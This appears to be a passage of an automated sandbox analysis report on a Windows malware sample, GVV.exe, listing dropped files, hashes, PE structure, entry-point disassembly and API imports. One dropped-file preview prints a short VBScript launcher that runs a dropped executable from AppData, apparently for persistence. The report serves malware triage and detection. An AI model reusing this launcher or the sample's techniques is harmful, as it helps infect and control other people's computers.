              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:data
              Category:dropped
              Size (bytes):415558
              Entropy (8bit):7.980802161270596
              Encrypted:false
              SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
              MD5:6167A7957E72F9B3A53C5667A7C56057
              SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
              SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
              SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
              Malicious:false
              Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:data
              Category:dropped
              Size (bytes):9916
              Entropy (8bit):7.600038819371061
              Encrypted:false
              SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
              MD5:85EC07A5B813744D5460158A4F4C3B75
              SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
              SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
              SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
              Malicious:false
              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:data
              Category:dropped
              Size (bytes):494592
              Entropy (8bit):7.519227488221947
              Encrypted:false
              SSDEEP:12288:21RC4HwaoZnJX1NpLh7MvRh+cnz3LbsUsVLLYn:d4zaJXdLh7gkcnzcZW
              MD5:1C497907667183BDB5AEFBAF2BB74A28
              SHA1:8DFD33CDF0751BBC78FB0F96799416CA6A06FB2E
              SHA-256:5DD4707D740D281210F4F9F7756E054F87D90B6DB0C4DB0D6F65E42210C6E441
              SHA-512:A37581C9BCA68617F3653CC5F35A41A00F9F8CB6BAC55C55C2A206E3AEEC2C8E02CAAC1C23C1337D9402F38F06EC0472B22094BFCB0D1A28A8701E4A35E03F19
              Malicious:false
              Preview:.n.ZTXL50J46..JJ.XZWXL54.4661JJ4XZWXL54J4661JJ4XZWXL54J4661JZ5XZYG.;4.=...K..y.?1?.D8[QDP'jW94978.V/.DC_j#Zx...lX[.Q.;<@n4XZWXL58..~.4|..)...J.R.Hj..J.<q&...4.P.O...&...2|.J.l#4..$...Jf..H..5F..)...K ..Hp..J...&...4A..O...'v..2.`J...4...%...Kf#W^~.44XZWXL54J4661JJ4..WX.43Jo..TJJ4XZWXL.4H5=7?JJF]ZWNN54J46.xIJ4HZWX.04J4v61ZJ4XXWXI55J4661OJ5XZWXL5.B4621JJ4XZUXL.4J$66!JJ4XJWX\54J466!JJ4XZWXL54J..01NK4XZ._L.~J4661JJ4XZWXL54J466.MJ.cZW..34r4661JJ4XZWXL54J4661..2XBWXLM.L4v61JJ4XZWXL54.16.5JJ4XZWXL54J4661JJ4XZWXL54J.BSI>J4X/&]L5$J46D4JJ0XZWXL54J4661JJ.XZ7v>QU>U66.3K4X.RXLO5J4@31JJ4XZWXL54J4v61.dP9.6XL5p.466!MJ4VZWX.34J4661JJ4XZWX.54..BZBJJ4XSWXL5DM4641JJ.^ZWXL54J4661JJtXZ.v+S].G66.HJ4X.PXL14J4611JJ4XZWXL54J4v61.dF+(4XL5..466.MJ4.ZWXH24J4661JJ4XZWX.54..DS]%)4X.lXL5.M46.1JJd_ZWXL54J4661JJtXZ.XL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:ASCII text, with very long lines (29744), with no line terminators
              Category:dropped
              Size (bytes):29744
              Entropy (8bit):3.547357781785406
              Encrypted:false
              SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNb2E+Ix24vfF3if6gy6rE:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Rl
              MD5:34F0F69B281BEFD351CFD575548C405E
              SHA1:BF1A53BE845395604BA157EF73ECC2881B5D59BB
              SHA-256:D59EE71397DCB4366353F472260A6178C00A79DD50562E440B4E8CB26090EEF9
              SHA-512:020C19E4CF6DEF3A80BC65257263D00BC365A90871B3E3EA90B02CD25B53F83FC081DA2443778ED9FDF11407E3F9BB6C2EED6343AB2CB414EAE84167F68B8686
              Malicious:false
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):116712960
              Entropy (8bit):7.9996147912630144
              Encrypted:true
              SSDEEP:393216:O3dRRpERafh/JijmNabDYE4Z51CbfRz9e8f+oj+X89vHez17pFDu6uWjNAl9fB5K:O5Jp3qgpDX6l9YOoWb3VP3ChIPwaE
              MD5:67B3857DEE4F4219F088B87902BFF4B0
              SHA1:BAB4083E3728D86834B4E3D7E471294C070F0AB9
              SHA-256:F0A5BEA34655560A7D3DB32ABECDE11185B6424AE95F8375AB91DEF91426AE65
              SHA-512:77F907F0DD7894E97DAE480A43A4E1D85D3F3B32E286370EAB58D3E45DD9FDDC8A7CF8F5361B2C0C423DA2239B6298AAE5E1959AF013323FFD92013DDAD6F6F3
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....b3f.........."..........6......w.............@..........................@............@...@.......@.....................d...|....@..D{.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...D{...@...|..................@..@.reloc...u.......v...p..............@..B........................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):286
              Entropy (8bit):3.37023866098958
              Encrypted:false
              SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1WlMg6DIAnriIM8lfQVn:DsO+vNlDQ1vgEPmA2n
              MD5:44F3E839A1990F835FB83D6211427B16
              SHA1:497F4D458DE63028582B4366D4D3DD13F36620D4
              SHA-256:CCCD137E79E511883B63E4E4CECDDE0AF8A60283CEC1C1B7D327346D99073E49
              SHA-512:E8759644E1D4941F0C1680946356E80F2620A797A993E52D1018377CD2D3D079E437AC3FB5A0354CDC1E776CA50AC244C4A086DEC1DC664B703297BE7B0926CA
              Malicious:true
              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.i.l.v.e.x.e.s.\.d.e.b.l.a.t.e.r.a.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
              Process:C:\Windows\SysWOW64\svchost.exe
              File Type:data
              Category:dropped
              Size (bytes):288
              Entropy (8bit):7.23939860202269
              Encrypted:false
              SSDEEP:6:u5J530FDTaWJFP2U5Z7wqxJRhnlNTJdRcuExpSy7JFH3ggINkP:2330F7JFPv5+qxJHnlBL2uEx08MrkP
              MD5:19E2694A14A9EC567FB5E94FC4239A5E
              SHA1:CC440919BF546F39B7422C5193764F8B68181EB0
              SHA-256:20F34F3B24DD8ABF1D50D0099C57F38FA3034F36E46CB10EEFAE11B164229B4A
              SHA-512:B7325AB7A0CDF28E84EAF542952033BD73A3F0388A54AC6AE9EDA3121B96DB823F7CDA01C8FE51F08D7F094453558D05256533708DC55C230383ECCDB543F053
              Malicious:false
              Preview:.D{6............x.X"..`...Y.N.xv..2E....).....X5.q..i5&....mO..b....R....hV...5.r.M.z.C..@j.g.#....FPc..-r..[!........]........._.c......{.).......V.-.P.*.sdv...%;&..e.....I......@R.....Z.G..B.6+Z..zz.&........)...QUI.&...t.......`,.......\1+R....^.....A...."./,.>`.....(..*..
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1835008
              Entropy (8bit):4.469392039413486
              Encrypted:false
              SSDEEP:6144:XzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNWjDH5S:DZHtYZWOKnMM6bFp0j4
              MD5:F1E21314CC90BF487BD4841E07BFEBC5
              SHA1:406075C87F2E8EF6D13FDAB88F9CB3FF6F89D561
              SHA-256:FF98034A43B8BEB2616820F87C28C8AD808AF45D0BF60846D3F12C8ACF0F8376
              SHA-512:0DDFF38EA320CE81081324582DD783BAF6F931C39224B9A4AC94440922BE7FB24F7C6A2F3430C96059789DCE5743ED89EE74DC5622FDDB2D2602680BF11105DE
              Malicious:false
              Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.L"...................................................................................................................................................................................................................................................................................................................................................5<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.252987156080183
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:GVV.exe
              File size:1'369'600 bytes
              MD5:fa3641c75d2beb68c01e8065eefc4707
              SHA1:1a2f7c3bb7190f8d8e1685e4e1fd77ebecc699ba
              SHA256:e28c8fc4052dbd472cc6245f605064f85ebb36371b43246066fdbeca547cbd17
              SHA512:6624af74d2f22e87fd2e2acee58d15cda54a7888567c9625b7cedf481008144b54e52668d3ed65df46ed04d8ea59fc308d5db6e9805d20b0c8b0278c81a19c0f
              SSDEEP:24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8aRMWJLRH4NnPncMw:GTvC/MTQYxsWR7aRLNHWPp
              TLSH:FA55C00273D1D022FFAB92334B5AF6115BBC6A260123E61F13981D79BE705B1563E7A3
              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
              Icon Hash:aaf3e3e3938382a0
              Entrypoint:0x420577
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
              Time Stamp:0x66336200 [Thu May 2 09:50:56 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:948cc502fe9226992dce9417f952fce3
              Instruction
              call 00007F0EBD5617B3h
              jmp 00007F0EBD5610BFh
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F0EBD56129Dh
              mov dword ptr [esi], 0049FDF0h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 0049FDF8h
              mov dword ptr [ecx], 0049FDF0h
              ret
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F0EBD56126Ah
              mov dword ptr [esi], 0049FE0Ch
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 0049FE14h
              mov dword ptr [ecx], 0049FE0Ch
              ret
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 0049FDD0h
              and dword ptr [eax], 00000000h
              and dword ptr [eax+04h], 00000000h
              push eax
              mov eax, dword ptr [ebp+08h]
              add eax, 04h
              push eax
              call 00007F0EBD563E5Dh
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 0049FDD0h
              push eax
              call 00007F0EBD563EA8h
              pop ecx
              ret
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 0049FDD0h
              push eax
              call 00007F0EBD563E91h
              test byte ptr [ebp+08h], 00000001h
              pop ecx
              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x77b44 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14c000 | 0x7594 | .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc | 0xd4000 | 0x77b44 | 0x77c00 | a3c94159b2ab5e18e773c6c73155ac9d | False | 0.9466662317327766 | data | 7.934055930890062 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc | 0x14c000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
              RT_ICON | 0xd44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
              RT_ICON | 0xd45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
              RT_ICON | 0xd48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
              RT_ICON | 0xd49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
              RT_ICON | 0xd5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
              RT_ICON | 0xd6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
              RT_ICON | 0xd6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
              RT_ICON | 0xd8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
              RT_ICON | 0xd9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
              RT_STRING | 0xda148 | 0x594 | data | English | Great Britain | 0.3333333333333333
              RT_STRING | 0xda6dc | 0x68a | data | English | Great Britain | 0.2735961768219833
              RT_STRING | 0xdad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
              RT_STRING | 0xdb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
              RT_STRING | 0xdb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
              RT_STRING | 0xdbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
              RT_STRING | 0xdc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
              RT_RCDATA | 0xdc410 | 0x6f1ac | data | | | 1.0003208198925913
              RT_GROUP_ICON | 0x14b5bc | 0x76 | data | English | Great Britain | 0.6610169491525424
              RT_GROUP_ICON | 0x14b634 | 0x14 | data | English | Great Britain | 1.15
              RT_VERSION | 0x14b648 | 0x10c | data | English | Great Britain | 0.5932835820895522
              RT_MANIFEST | 0x14b754 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
